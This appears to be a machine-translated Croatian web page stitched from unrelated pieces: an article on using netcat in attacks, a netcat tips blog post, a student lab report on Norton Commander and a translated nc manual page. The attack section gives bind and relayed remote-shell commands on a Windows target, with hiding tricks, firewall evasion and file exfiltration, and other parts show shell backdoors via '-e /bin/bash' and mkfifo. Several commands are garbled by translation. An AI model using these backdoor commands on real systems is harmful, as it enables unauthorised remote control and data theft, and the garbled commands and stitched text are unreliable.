Netcat nc s podrškom za parametre. Korisni Unix uslužni programi. Netcat. ...i prijenosni skener portova
Glavna svrha uslužnog programa netcat (ili 'nc', kako se naziva odgovarajuća izvršna datoteka) je pružiti korisniku mogućnost prijenosa bilo kojih podataka preko mreže koristeći TCP ili UDP transportni protokol. Osim toga, netcat može izvesti nekoliko drugih zanimljivih funkcija, kao što je skeniranje UDP ili TCP portova.
U tom slučaju korisnik može posebno:
- slobodno odaberite priključak za vezanje (lokalni i udaljeni);
- izvoditi (ne izvoditi) unaprijed i obrnuto prevođenje DNS imena;
- vezati netcat na bilo koju od adresa mrežne razine lokalnog čvora;
- prijenos ulaznih poruka na obradu u drugi program;
- šifrirati podatke koji se prenose (ova značajka je implementirana u netcat verziji, tzv. cryptcat).
Osnovni načini rada
Osnovni načini rada uslužnog programa netcat su način rada klijenta i način rada poslužitelja.
Najjednostavnija opcija za pokretanje u načinu rada klijenta:
nc host port
(ako trebate koristiti TCP protokol), ili
nc -u port glavnog računala
(ako trebate koristiti UDP protokol).
Ako opcija -u nije omogućena, odmah nakon pokretanja u ovom načinu rada, netcat pokušava uspostaviti TCP vezu na port port glavnog čvora.
Posao netcat-a je prenijeti na host:port socket sve što mu dolazi kroz standardni INPUT kanal, te izdati na standardni OUTPUT sve što mu dolazi iz ovog socketa.
Najjednostavnija opcija za pokretanje u poslužiteljskom načinu rada:
nc -l -p priključak
Nakon pokretanja u ovom načinu rada, netcat čeka na zahtjeve za uspostavu veze s portom TCP porta. Nakon uspostavljanja veze, sve što mu dolazi preko ove veze izbacuje na standardni OUTPUT kanal, a šalje natrag sve što mu dolazi preko standardnog ULAZNOG kanala.
Korištenje u pripremi i provođenju softverskih napada
Tako široka namjena uslužnog programa netcat otvara mnoge mogućnosti za njegovu upotrebu. Prilikom pripreme i izvođenja softverskih napada, moguće je koristiti netcat za rješavanje sljedećih problema, na primjer:
- identifikacija usluga koje pružaju mrežni čvorovi (skeniranjem TCP i UDP portova);
- identifikaciju softverskih usluga koje mrežni čvorovi pružaju (prikupljanjem tokena);
- prodor u mrežne čvorove ili poremećaj dostupnosti usluga koje oni pružaju;
- stvaranje skrivenih kanala za kontrolu mrežnih čvorova;
- stvaranje skrivenih kanala za prijenos podataka.
U posljednja dva slučaja, mogućnost šifriranja razmjene između klijenta i netcat poslužitelja (implementirana u cryptcat) vrlo je korisna.
Korištenje netcat-a za prodiranje u mrežna računala ili daljinsko ometanje dostupnosti usluga koje pružaju
O prodoru u mrežni čvor govori se u dva smisla:
1) o preuzimanju ovlasti korisnika čvora (od strane subjekta koji nije imao ovlasti u vezi s tim čvorom);
2) kako prevladati ograničenja u razmjeni informacija s čvorom koja nameće zaslon vatrozida (mreže).
netcat može biti koristan u oba slučaja.
Preuzimanje ovlasti moguće putem daljinskog napada na poslužitelj koji pripada meti napada (koristeći, na primjer, ranjivost poslužitelja kao što je prekoračenje međuspremnika). U tom slučaju napadač mora moći prenijeti određene podatke na poslužitelj. U pravilu, to su podaci koji se ne mogu prenijeti pomoću običnog klijentskog programa (ali je moguće pomoću netcat-a, jer netcat omogućuje prijenos bilo kakvih podataka).
Probiti vatrozid (mreža) Netcatova sposobnost vezanja na bilo koji lokalni port (omogućeno s -p opcijom) može pomoći. Na primjer, ako se netcat u načinu rada klijenta veže na TCP port 20 (ftp-podaci), u mnogim će slučajevima vatrozidi dopustiti povezivanje s host(ovima) na mreži koju štite.
Kako bi se poremetila dostupnost usluga, može se koristiti sposobnost netcat-a da prenese bilo kakve podatke bilo kojem poslužitelju (na primjer, netočni zahtjevi koji dovode do zamrzavanja poslužitelja).
Korištenje netcat-a za stvaranje skrivenih kontrolnih kanala za mrežne čvorove
Pretpostavimo da je meta napada računalo koje pokreće MS Windows NT. Nastupivši na meti napada
nc –L -p xxxx -d -e cmd.exe
(gdje je xxxx proizvoljni broj porta), dobivamo skriveni kontrolni kanal za ovaj objekt. Ovdje opcija -e omogućuje način rada u kojem je standardni OUTPUT rezultata netcat-a povezan sa standardnim ULAZOM cmd.exe-a, a standardni OUTPUT rezultata i poruka o greškama cmd.exe-a povezan je sa standardnim ULAZOM netcat-a. Opcija -L ima isti učinak kao -l, s tom razlikom što specificira da se netcat mora ponovno pokrenuti s istim argumentima nakon svake veze. Opcija -d (odvoji) koristi se za skrivanje pokretanja (netcat ne stvara prozore i ne prikazuje se na popisu zadataka). Dodatni učinak skrivanja može se postići preimenovanjem netcat izvršne datoteke.
Možete koristiti ovaj kanal ako, na primjer, pokrenete netcat na drugom čvoru na sljedeći način:
nc troy xxxx
gdje je troy adresa ili naziv cilja napada.
Opcija -e, međutim, nije uvijek podržana od strane netcat implementacija. Ako ova opcija nije podržana, sličan rezultat može se postići pokretanjem dvije instance netcat-a na meti napada i na napadačevom hostu. Na primjer, možete koristiti sljedeći scenarij. Na cilj napada pokrenite:
nc -L -p xxxx -d | cmd.exe | nc odisej gggg
gdje je odysseus adresa ili ime hosta napadača.
I na čvoru napadača:
nc -l -p gggg
nc troy xxxx
Ovaj scenarij se zove port prosljeđivanje . Obratite pozornost na točan redoslijed pokretanja programa (u ovom tekstu je pogrešno prikazano: poslužitelj se mora pokrenuti prije klijenta).
Ova skripta se može mijenjati. Na primjer, pokrenite netcat na meti napada samo u načinu rada klijenta, a na hostu napadača samo u načinu rada poslužitelja ili obrnuto (pridržavajući se ispravnog redoslijeda pokretanja: poslužitelj bi se trebao pokrenuti prije klijenta).
Manipulacija načinima pokretanja netcat-a, zajedno s ispravnim odabirom brojeva priključaka, može u mnogim slučajevima nadvladati vatrozid (mrežu) ako se potonji koristi za zaštitu cilja napada (na primjer, ako se koristi gornji scenarij, odabirom xxxx = 80 može biti uspješan u mnogim slučajevima (port HTTP poslužitelja), yyyy = 25 (port SMTP poslužitelja)).
Korištenje netcat-a za stvaranje skrivenih podatkovnih kanala
Razmotrite, na primjer, kako koristiti netcat za prijenos datoteke sa utičnice troy:xxxx na utičnicu mac:yyyy.
Da biste to učinili, samo pokrenite nešto poput ovoga na mac čvoru:
nc -l -p yyyy > dragi
i na čvoru troy:
nc -p xxxx mac yyyy< prayer
I ovdje, pravilna manipulacija načinima pokretanja netcata i brojevima portova može pomoći u prevladavanju ograničenja koja nameću vatrozidi.
Ovo je drugi post u nizu članaka o Unix pomoćnim programima koje biste trebali znati. U ovom članku predstavljam vam uslužni program netcat ili jednostavno nc.
Uslužni program Netcat često se naziva nekom vrstom "švicarskog noža", u dobrom smislu te riječi. Funkcionalnost netcat-a korisna je u istoj mjeri u kojoj je korisna svestranost i praktičnost provjerenog džepnog švicarskog nožića. Neke od njegovih mogućnosti uključuju skeniranje portova, prijenos datoteka, slušanje portova i može se koristiti kao stražnja vrata.
Netcat je bio rangiran na 4. mjestu u istraživanju "100 uslužnih programa za mrežnu sigurnost" 2006., tako da je to definitivno alat koji trebate poznavati.
Kako koristiti nc?
Ako se sjećate, rekao sam da je netcat švicarski vojni nož. Što bi ovaj nož bio da se ne može koristiti kao običan nož? Zbog toga se netcat može koristiti umjesto običnog telneta:
$nc www.google.com 80
Zapravo je praktičniji od običnog telneta jer vezu možete prekinuti u bilo kojem trenutku pritiskom na Ctrl+C i tretira binarne podatke kao normalne (bez izlaznih sekvenci, ništa).
Možete dodati opciju -v za detaljniji prikaz rezultata radnji i opciju (-vv) za dobivanje statistike o tome koliko je bajtova preneseno tijekom trenutne sesije povezivanja.
Netcat se može koristiti kao poslužitelj. Ako ga pokrenete kao ispod, slušat će na portu 12345 (na svim sučeljima):
$ nc -l -p 12345
Sada ako se spojite na port 12345 ovog hosta, sve što upišete bit će poslano na udaljenu stranu, što nam govori da se netcat može koristiti kao poslužitelj za chat. Pokrenite na jednom od računala:
# Na računalu A s IP 10.10.10.10 $ nc -l -p 12345
I povežite se s njim s drugog:
# Na računalu B $ nc 10.10.10.10 12345
Sada obje strane mogu razgovarati!
Ovaj način razgovora, gdje obje strane mogu razgovarati jedna s drugom, omogućuje korištenje nc za I/O operacije preko mreže! Na primjer, možete poslati cijeli direktorij s jednog računala na drugo pokretanjem tar cjevovoda putem nc na prvom računalu i preusmjeravanjem izlaza na drugi tar proces na drugom.
Recimo da želite poslati datoteke iz /data direktorija računala A s IP-om 192.168.1.10 na računalo B (s bilo kojim IP-om). Jednostavno je:
# Na računalu A s IP 192.168.1.10 $ tar -cf - /podaci | nc -l -p 6666 # Na računalu B $ nc 192.168.1.10 6666 | tar -xf -
Ne zaboravite kombinirati cjevovod s Pipe Viewerom, što je opisano u prethodnom članku, kako biste vidjeli statistiku o tome koliko brzo dolazi do prijenosa!
Jedna datoteka može se poslati jednostavnije:
# Na računalu A s IP 192.168.1.10 $ cat file | nc -l -p 6666 # Na računalu B $ nc 192.168.1.10 6666 > datoteka
Možete čak kopirati i vratiti cijeli disk koristeći nc:
# Na računalu A s IP 192.168.1.10 $ cat /dev/hdb | nc -l -p 6666 # Na računalu B $ nc 192.168.1.10 6666 > /dev/hdb
Napomena: Opcija “-l” ne može se koristiti zajedno s “-p” na Mac računalima! Rješenje je jednostavno zamijeniti “-l -p 6666? do “-l 6666?. Kao ovdje:
# sada nc sluša port 6666 za Mac računala $ nc -l 6666
Uobičajena upotreba netcat-a je skeniranje portova. Netcat nije najbolji alat za ovu vrstu posla, ali obavlja posao (najbolji je, naravno, nmap):
$ nc -v -n -z -w 1 192.168.1.2 1-1000 (NEPOZNATO) 445 (microsoft-ds) otvoreno (NEPOZNATO) 139 (netbios-ssn) otvoreno (NEPOZNATO) 111 (sunrpc) otvoreno (NEPOZNATO) 80 ( www) otvoreno (NEPOZNATO) 25 (smtp) : Veza je istekla (NEPOZNATO) 22 (ssh) otvoreno
Opcija -n sprječava DNS traženja, -z ne čeka odgovor od poslužitelja, a -w 1? postavlja istek vremena veze na 1 sekundu.
Još jedna netrivijalna upotreba netcat-a je kao proxy. Mogu se proslijediti i port i host. Pogledajte ovaj primjer:
$ nc -l -p 12345 | nc www.google.com 80
Ova naredba pokreće nc na portu 1234 i preusmjerava sve veze na google.com:80. Ako se sada spojite na ovo računalo na portu 12345 i napravite zahtjev, vidjet ćete da ne primate nikakve podatke kao odgovor. To je točno jer nismo uspostavili dvosmjerni kanal. Ako dodate drugi kanal, primit ćete svoje podatke na drugom priključku:
$ nc -l -p 12345 | nc www.google.com 80 | nc -l -p 12346
Nakon slanja zahtjeva na port 12345, primite svoje podatke o odgovoru na portu 12346.
Vjerojatno najmoćnija značajka netcat-a je pokretanje bilo kojeg procesa kao poslužitelja:
$ nc -l -p 12345 -e /bin/bash
Opcija -e uzrokuje preusmjeravanje ulaza i izlaza kroz mrežnu utičnicu. Sada, ako se spojite na host na portu 12345, možete koristiti bash:
$ nc lokalni host 12345 ls -las ukupno 4288 4 drwxr-xr-x 15 pkrumins korisnici 4096 2009-02-17 07:47 . 4 drwxr-xr-x 4 pkrumins korisnika 4096 2009-01-18 21:22 .. 8 -rw------- 1 pkrumins korisnika 8192 2009-02-16 19:30 .bash_history 4 -rw-r- -r-- 1 pkrumins korisnika 220 2009-01-18 21:04 .bash_logout ...
Posljedice su da je nc popularan hakerski alat i može se vrlo lako koristiti za stvaranje stražnjih vrata. Na Linux poslužitelju možete pokrenuti /bin/bash, a na Windows cmd.exe i imati punu kontrolu u svojim rukama.
To je sve što sam htio reći. Znate li još neke korisne netcat trikove koji ovdje nisu obrađeni?
Kako instalirati nc?
Ako imate Debian ili sustav temeljen na Debianu kao što je Ubuntu, učinite sljedeće:
$ sudo aptitude instalirajte netcat
Ako imate Fedoru ili sustav temeljen na Fedori kao što je CentOS, učinite sljedeće:
$ sudo yum instalirajte netcat
Ako imate Slackware, FreeBSD, NetBSD, Solaris ili Mac, preuzmite nc izvore i učinite:
$ tar -zxf nc-version.tar.gz $ cd nc-version $ ./configure && sudo make install
Drugi način da to učinite na Macu ako imate MacPorts:
$ sudo port instaliraj netcat
Na Slackware ga možete instalirati kao paket iz direktorija paketa:
$ sudo installpkg nc-1.10-i386-1.tgz
Ako imate Windows, preuzmite Windoze port sa securityfocusa.
Priručnik za pomoćni program može se pronaći u man nc.
Zabavite se uz nc do sljedećeg puta!
Zavod za projektiranje cesta
Laboratorijski rad br.1
na kolegiju "Informatika"
Ispunio student grupe br. 114359 Raikhman Sergey Yurievich
ProvjerenoLaboratorijski rad br.1
Predmet: Uslužni program Norton Commander
Cilj: Naučite upravljati svojim računalom pomoću Norton Commandera
Norton Commander vam omogućuje izvođenje sljedećih funkcija: 1) izvođenje MS-DOS funkcija, 2) prikaz sadržaja direktorija na diskovima, 3) prikaz stabla direktorija na disku, 4) pregled datoteka, 5) uređivanje tekstualnih datoteka, 6 ) kopiranje, premještanje, preimenovanje, brisanje datoteka, 7) promjena atributa datoteke.
Pokreni Norton Commander
Za pokretanje Norton Commandera upišite “nc” u naredbeni redak i pritisnite “Enter”. Izađite iz Norton Commandera - F10 ili ALT+X
Pogled na zaslon i ploče
Nakon pokretanja Norton Commandera, na ekranu se pojavljuju dva pravokutna prozora (ploče).
Ispod ovih panela nalazi se MS-DOS prompt i informativni redak sa značenjima funkcijskih tipki.
F1 HELP – kratka informacija o namjeni tipki pri upravljanju NC-om.
F2 MENU – korisnički izbornik
F3 VIEW – pregled tekstualne datoteke, dokumenta
F4 EDIT – uređivanje tekstualne datoteke
F5 COPY – kopiranje datoteka
F6 RENMOV – naprijed, preimenuj datoteku
F7 MKDIR – kreiranje imenika (poddirektorija)
F8 DELETE – brisanje datoteka ili poddirektorija
F9 PULL DN – izbornici koji sadrže NC načine rada prikazuju se u gornjem retku ekrana.
F10 IZLAZ – izlaz iz NC
Izbornik pritiskom na tipku F9
Lijevo i desno – postavlja načine prikaza informacija na lijevoj i desnoj ploči
Datoteke – s datotekama se izvode razne operacije
Naredbe – izvršava različite NC naredbe, postavlja NC konfiguraciju i načine rada.
Jedna od stavki izbornika je označena; odaberite drugu stavku, koristite strelice<¬>, <>, <®>, <¯>i pritisnite tipku “Enter”.
Odabir datoteka
Za kopiranje, brisanje, premještanje datoteka potrebno ih je označiti pritiskom na tipku Ins. Za poništavanje odabira ponovno pritisnite “Ins”. Informacije o broju odabranih datoteka pojavljuju se na dnu ploče.
Izrada imenika
Da biste stvorili direktorij, pritisnite tipku “F7”, upišite njegov naziv i pritisnite “Enter”.
Za ulazak u imenik pritisnite tipku “Enter” na njegovom nazivu. Kada pritisnete tipke “ALT+F10”, na ekranu se prikazuje stablo direktorija. Pomoću kursorskih tipki možete se brzo pomaknuti do željenog poddirektorija.
Osnovni ključevi NC
TAB – prebacivanje na drugu ploču
ALT+F1 – izlaz u lijevom panelu tablice sadržaja drugog diska.
ALT+F2 – izlaz u desnom panelu tablice sadržaja drugog diska
CTRL+F1 – uklonite lijevu ploču sa zaslona
CTRL+F2 – uklonite desnu ploču sa zaslona
CTRL+O – uklonite oba panela
CTRL+U – zamjena panela
Za pokretanje računala potrebno je upisati “LOGIN” u promptnom retku i unijeti lozinku (335_2).
Laboratorijske zadaće
Pomoću naredbi kreirajte strukturu poddirektorija na disku:
Upute za rad uNortonZapovjednik
Za pokretanje NC sustava upišite NC naredbu u DOS naredbeni redak ili kliknite lijevom tipkom miša na NC ikonu na radnoj površini računala. Za završetak rada s NC-om pritisnite tipku [ F10] . U dijaloškom okviru koji se pojavi odaberite odgovor “Da” ako se odjavljujete iz sustava, u suprotnom “Ne”. Odabir opcije odgovora vrši se pomoću tipki kursora na funkcijskoj tipkovnici i zatim pritiskom na tipku [ Unesi] . Dno ekrana sadrži DOS naredbeni redak, gdje možete unijeti odgovarajuće naredbe dok radite pod NC kontrolom. Najniži redak na ekranu sadrži redak sa savjetom, koji označava svrhu glavnih "vrućih" tipki koje odgovaraju NC (i DOS) naredbama.
Nakon pokretanja NC-a, na ekranu se pojavljuju dva panela - lijevi i desni. Na vrhu svake ploče, mali pravokutni prozor prikazuje puni put do trenutne datoteke ili direktorija. Ploča u kojoj se nalazi označeni pravokutnik, kursor, naziva se aktivnom. Za pomicanje s panela na panel koristite tipku . Ako su odabrani gornji redak na ploči i slika “…” to znači da ste u imeniku s imenom prikazanim na vrhu ploče. Za rad s panelima koriste se sljedeće naredbe:
[ Ctrl] + [ F1] Sakrij/prikaži lijevu ploču
[ Ctrl] + [ F2] Sakrij/prikaži desnu ploču
[ Ctrl] + [ U] Zamijenite ploče
[ Ctrl] + [ O] Sakrij/prikaži obje ploče
[ Ctrl] + [ P]Sakrij/prikaži neaktivnu ploču
Za promjenu naziva logičkog diska kliknite na lijevu ploču [ Alt] + [ F1] , u dijaloškom okviru koji se pojavi, pomoću tipki kursora odaberite željeni naziv diska među predloženim nazivima, pritisnite tipku [ Unesi] . Za desnu ploču radnje su slične, ali na početku trebate kliknuti [ Alt] + [ F2] .
Za odlazak u imenik odaberite ga na aktivnoj ploči i pritisnite tipku [ Unesi] . Za odlazak u direktorij više razine na aktivnoj ploči odaberite liniju “…” i pritisnite tipku [ Unesi] .
Za rad s imenicima koriste se sljedeće naredbe:
[ F7] – kreirajte imenik. U dijaloškom okviru koji se pojavi navedite novi naziv direktorija;
[ F8] – brisanje imenika. U dijaloškom okviru koji se pojavi potvrdite brisanje ili poništite brisanje pritiskom na tipku Esc.
Za rad s datotekama koriste se sljedeće naredbe:
[ Shift] + [ F4] – kreirajte datoteku. U dijaloški okvir koji se pojavi unesite novi naziv datoteke (ne zaboravite navesti ekstenziju). Nakon što odredite naziv datoteke, upišite sadržaj datoteke u radni prostor zaslona. Dovršite stvaranje datoteke s naredbom [ Ctrl] + [ Z]. Da biste spremili datoteku, pritisnite tipku [ F2] . Tipkom izađite iz moda za uređivanje [ F10 ] .
[ F4] – uređivanje prethodno kreiranog dokumenta. U tom slučaju u dijaloškom okviru morate navesti naziv datoteke koju želite urediti. Kada radite u načinu uređivanja, u prostoru zaslona pri dnu pojavljuje se redak sa savjetima s dodjelom tipki prečaca u načinu uređivanja.
[ Shift] + [ F2] – spremite datoteku pod novim imenom.
[ F3] – pregled sadržaja datoteke. Da biste to učinili, prvo odaberite datoteku na ploči.
[ F5] – kopiranje datoteke. Sve operacije s datotekama i direktorijima izvode se pomoću obje ploče. Za kopiranje datoteke, na neaktivnoj ploči postavite direktorij u koji će se kopirana datoteka smjestiti, idite u ovaj direktorij. Na aktivnoj ploči odaberite datoteku koju želite kopirati i pritisnite tipku [ F5] . Za potvrdu kopiranja pritisnite tipku [ Unesi] , Otkazati - .
[ F6] – prijenos/preimenovanje datoteke. Operacija je slična kopiranju. Za premještanje datoteke, na neaktivnoj ploči postavite direktorij u koji će datoteka biti smještena i idite u taj direktorij. U aktivnoj ploči odaberite datoteku koju želite premjestiti i pritisnite tipku [ F6] . Da biste preimenovali datoteku, navedite novi naziv datoteke u dijaloškom okviru tako da ga dodate putem ikone ” \ ” u označavanju puta. Neophodno je zapamtiti da se premještena datoteka briše s izvorne lokacije.
[ F9] – idite na izbornikNC.
Grupne operacije nad datotekama
Operacije kopiranja, premještanja i brisanja mogu se izvoditi na nekoliko datoteka istovremeno. Da biste to učinili, morate ih označiti tako da ih označite na ploči i pritisnete tipku [ Umetnuti] . U tom su slučaju odabrane datoteke označene pravokutnicima kontrastne boje. Za uklanjanje odabira ponovite ove korake. Nakon postupka odabira datoteka, nad grupom datoteka kao da je jedna, izvodi se potrebna operacija (kopiranje, premještanje, brisanje). Drugi način odabira datoteke je pritiskom na veliku sivu tipku ”+” na funkcijskoj tipkovnici s lijeve strane. Nakon što pritisnete ovu tipku, trebali biste navesti naziv datoteke u dijaloškom okviru ili navesti nazive datoteka kada koristite masku u nazivu: “ * ”, “ *.* ”, “ ? ”. Za poništavanje odabira datoteka koristite tipku “-” na funkcijskoj tipkovnici s lijeve strane.
Izbornik sustava NC
Sustav izbornika dizajniran je za prilagođavanje ljuske i olakšavanje operacija. Traka izbornika se poziva pritiskom na tipku [ F9] . Sustav izbornika sastoji se od trake izbornika i padajućih izbornika. Izbornik sadrži sljedeće stavke: Desno Datoteke Naredbe Postavke Lijevo . Timovi Pravo I Lijevo odrediti izbor načina prikaza datoteke na ploči. Sve opcije naredbi za lijevu i desnu ploču su identične. Tim Datoteke dizajniran za izvođenje operacija na datotekama i direktorijima. Stavka izbornika Timovi je namijenjen za izvršavanje dodatnih naredbi. Tim postavke namijenjen je postavljanju NC okruženja. Odabir odgovarajuće naredbe vrši se pomoću kursorskih tipki i zatim pritiskom na [ Unesi].
Stavka izbornika Lijevo desno).
Padajući izbornik ove naredbe sadrži opcije za odabir formata za prikaz datoteke na ekranu. U načinu rada Kratak Ploča prikazuje samo nazive datoteka i direktorija. U načinu rada puna Prikazuje se naziv datoteke ili direktorija, za datoteku je navedena veličina, za direktorij - niz "poddirektorij", datum i vrijeme stvaranja datoteke i direktorija. U načinu rada Drvo Možete prikazati stablo direktorija trenutnog diska i koristiti kursor za brzo pronalaženje potrebne datoteke pomicanjem kroz stablo. Sljedeća grupa opcija za ovu stavku izbornika određuje redoslijed kojim se datoteke prikazuju na ploči. U ovom slučaju, datoteke se mogu poredati u bilo kojem redoslijedu - način Nema sortiranja , ali se mogu poredati određenim redoslijedom: Ime – imenom i prezimenom po abecednom redu, Proširenje – produžetkom po abecednom redu, Vrijeme – prema datumu kreiranja, pri čemu se datoteke s zadnjim datumima kreiranja nalaze na početku popisa, Veličina – prema veličini datoteke u silaznom redoslijedu. Odabir retka odgovarajućeg načina rada vrši se kursorom i postavljanjem potvrdnog okvira pomoću tipke "razmaknica".
Stavka izbornika Datoteke .
Padajući izbornik ove naredbe sadrži opis svrhe tipki prečaca [ F1] - [ F8] , tj. akcije prečaca dupliciraju se naredbama izbornika. Sljedeća opcija je Postavi atribute. Atributi su postavljeni samo za datoteke. Redoslijed postavljanja atributa je sljedeći: odaberite datoteku kursorom na ploči. Nakon toga, pritiskom na tipku [ F9] idite na NC izbornik i odaberite stavku Datoteke Montaža atributi . Nakon pritiska tipke [ Unesi] Popis mogućih atributa pojavljuje se u dijaloškom okviru: Samo za čitanje, arhiva, skriveno, sustav. Odabir retka atributa datoteke vrši se kursorom i označavanjem okvira pomoću razmaknice. U ovom slučaju, datoteka s atributima Samo za čitanje ne može se mijenjati i dostupan je samo za gledanje. Datoteka atributa Skriven na ploči je označen malim istaknutim pravokutnikom (ako opcija nije postavljena u postavkama zaslona Prikaži skrivene datoteke Naziv datoteke se uopće ne prikazuje na ploči). Sljedeća grupa naredbi omogućuje odabir datoteka (slično velikoj sivoj tipki ”+” ), poništi odabir (analogno tipki ” - ” na funkcijskoj tipkovnici), obrnuti odabir (analogno onoj ” * ” na funkcijskoj tipkovnici).
Stavka izbornika Timovi .
Padajući izbornik ove naredbe omogućuje stvaranje korisničkog izbornika, uređivanje ovog izbornika, pregled povijesti naredbi unesenih u DOS naredbenom retku i sadrži druge dodatne značajke NC ljuske.
Stavka izbornika postavke.
Padajući izbornik ove naredbe omogućuje vam da konfigurirate okruženje sučelja na jednostavan način. Sadrži opciju postavke Urednik i drugi. Kada odaberete traku izbornika Postavke, otvara se niz dijaloških okvira koji vam omogućuju odabir skupa boja za zaslon, postavljanje broja redaka na zaslonu itd. Dijaloški prozor Postavke ploče dopušta Prikaži skrivene datoteke, ako je odgovarajući potvrdni okvir označen (ili se ne prikazuje). Označavanje odgovarajućih okvira opcija također se vrši pomoću pokazivača i razmaknice.
Laboratorijska zadaća
nc [-46bCDdhklnrStUuvZz] [-I duljina] [-i interval] [-O duljina] [-P proxy_korisničko ime] [-str izvorni_port] [-q sekundi] [-s izvor] [-T ključna riječ] [-V rtable] [-w pauza] [-X proxy_protocol] [-x proxy_adresa[:luka]] [odredište] [luka]Mogućnosti
| -4 | Snage nc koristiti samo IPv4 adrese. |
| -6 | Snage nc koristiti samo IPv6 adrese. |
| -b | Dopusti emitiranje. |
| -C | Pošalji kao kraj retka. |
| -D | Omogući otklanjanje pogrešaka na utičnici. |
| -d | Ne pokušavajte čitati iz stdin-a. |
| -h | Ispisuje nc pomoć. |
| -ja duljina | Određuje veličinu TCP prijemnog međuspremnika. |
| -i interval | Određuje vremenski interval odgode između redaka poslanog i primljenog teksta. Također, uzrokuje vrijeme kašnjenja između veza na više priključaka. |
| -k | Snage nc kako bi nastavio osluškivati drugu vezu nakon završetka trenutne veze. Pogreška je koristiti ovu opciju bez -l opcija. |
| -l | Koristi se za određivanje toga nc treba osluškivati dolaznu vezu radije nego inicirati vezu s udaljenim hostom. Pogreška je koristiti ovu opciju zajedno s -str, -s, ili -z opcije. Dodatno, sva vremena čekanja navedena s -w opcija se zanemaruju. |
| -n | Nemojte vršiti nikakva traženja DNS-a ili usluge na navedenim adresama, imenima računala ili portovima. |
| -O duljina | Određuje veličinu TCP međuspremnika za slanje. |
| -P proxy_korisničko ime | Određuje korisničko ime za predstavljanje proxy poslužitelju koji zahtijeva provjeru autentičnosti. Ako nije navedeno korisničko ime, provjera autentičnosti se neće pokušati. Proxy provjera autentičnosti trenutno je podržana samo za HTTP CONNECT proxyje. |
| -str izvorni_port | Određuje izvorni priključak koji nc treba koristiti, ovisno o ograničenjima povlastica i dostupnosti. |
| -q sekundi | nakon EOF na stdin, pričekajte određeni broj sekundi i zatim zatvorite. Ako su sekunde negativne, čekajte zauvijek. |
| -r | Određuje da se izvorni ili odredišni priključci biraju nasumično umjesto uzastopno unutar raspona ili redoslijedom kojim im sustav dodjeljuje. |
| -S | Omogućuje RFC 2385 TCP MD5 opciju potpisa. |
| -s izvor | Određuje sučelje koje se koristi za slanje paketa. Za datagramske utičnice UNIX-domene, specificira lokalnu privremenu datoteku utičnice za stvaranje i korištenje kako bi se datagrami mogli primati. Pogreška je koristiti ovu opciju zajedno s -l opcija. |
| -T ključna riječ | Promjena IPv4 TOS vrijednosti. ključna riječ može biti jedan od kritično, inetcontrol, niska cijena, nisko kašnjenje, kontrola mreže, propusnost, pouzdanost, ili jedna od točaka koda DiffServ: ef, af11 ... af43, cs0 ... cs7; ili broj u heksadecimalnom ili decimalnom obliku. |
| -t | Uzroci nc za slanje RFC 854 DON"T i WON"T odgovora na RFC 854 DO i WILL zahtjeve. To omogućuje korištenje nc-a za skriptiranje telnet sesija. |
| -U | Određuje korištenje utičnica UNIX domene. |
| -u | Koristite UDP umjesto zadane opcije TCP-a. Za utičnice UNIX-domene, koristite utičnicu za datagram umjesto utičnice toka. Ako se koristi utičnica UNIX domene, privremena prihvatna utičnica stvara se u /tmp osim ako -s zastava je dana. |
| -V rtable | Postavite tablicu usmjeravanja koja će se koristiti. Zadana vrijednost je 0. |
| -v | Imati nc dati opširniji izlaz. |
| -w pauza | Veze koje se ne mogu uspostaviti ili su neaktivne isteknu nakon isteka vremena. The -w zastava nema utjecaja na -l opciju, tj. nc će zauvijek osluškivati vezu, sa ili bez -w zastava. Zadana postavka je da nema vremenskog ograničenja. |
| -X proxy_protocol | Zahtijeva da nc treba koristiti navedeni protokol kada razgovara s proxy poslužiteljem. Podržani protokoli su " 4 " (SOCKS v.4) " 5 " (SOCKS v.5) i " Spojiti" (HTTPS proxy). Ako protokol nije naveden, koristi se SOCKS verzija 5. |
| -x proxy_adresa[:port] | Zahtijeva da nc treba se povezati s odredištem pomoću proxyja na proxy_adresa i luka. Ako luka nije navedeno, koristi se dobro poznati port za proxy protokol (1080 za SOCKS, 3128 za HTTPS). |
| -Z | DCCP način rada. |
| -z | Određuje da nc treba samo skenirati slušajuće demone, bez slanja podataka njima. Pogreška je koristiti ovu opciju zajedno s -l opcija. |
odredište može biti brojčana IP adresa ili simboličko ime hosta (osim ako -n data je opcija). Općenito, odredište mora biti navedeno, osim ako -l dana je opcija (u kojem se slučaju koristi lokalni host). Za utičnice UNIX-domene potrebno je odredište i to je staza utičnice na koju se povezuje (ili sluša ako -l data je opcija).
port može biti jedan cijeli broj ili niz portova. Rasponi su u obliku nn-mm. Općenito, odredišna luka mora biti navedena, osim ako -U opcija je dana.
Klijent/poslužitelj model
Prilično je jednostavno izgraditi vrlo osnovni model klijent/poslužitelj pomoću nc. Na jednoj konzoli, počnite nc slušanje veze na određenom priključku. Na primjer:
Nc -l 1234
nc sada sluša port 1234 za vezu. Na drugoj konzoli (ili drugom stroju), spojite se na stroj i port koji se sluša:
Nc 127.0.0.1 1234
Sada bi trebala postojati veza između priključaka. Sve što se upiše na drugoj konzoli bit će spojeno na prvu i obrnuto. Nakon što je veza uspostavljena, nc zapravo ga nije briga koja se strana koristi kao 'poslužitelj', a koja strana se koristi kao 'klijent'. Veza se može prekinuti pomoću EOF (' ^D’).
Ne postoji -c ili -e opcija u modernom netcat-u, ali još uvijek možete izvršiti naredbu nakon što se veza uspostavi preusmjeravanjem deskriptora datoteke. Ovdje budite oprezni jer je otvaranje porta i dopuštanje bilo kome povezanom da izvrši proizvoljnu naredbu na vašoj stranici OPASNO. Ako to stvarno trebate učiniti, evo primjera:
Na strani 'poslužitelja':
Rm-f/tmp/f; mkfifo /tmp/f mačka /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
Na strani 'klijenta':
Nc host.example.com 1234
(prompt ljuske s host.example.com)
Započnite korištenjem nc za slušanje na određenom portu, s izlazom snimljenim u datoteku:
Nc -l 1234 > naziv datoteke.out
Pomoću drugog uređaja spojite se na slušalicu nc proces, unoseći mu datoteku koju treba prenijeti:
Nc host.example.com 1234< filename.in
Nakon prijenosa datoteke veza će se automatski zatvoriti.
Razgovor s poslužiteljima
Ponekad je korisno razgovarati s poslužiteljima "ručno", a ne preko korisničkog sučelja. Može pomoći u rješavanju problema kada bi moglo biti potrebno provjeriti koje podatke poslužitelj šalje kao odgovor na naredbe koje izdaje klijent. Na primjer, da biste dohvatili početnu stranicu web stranice:
Printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80
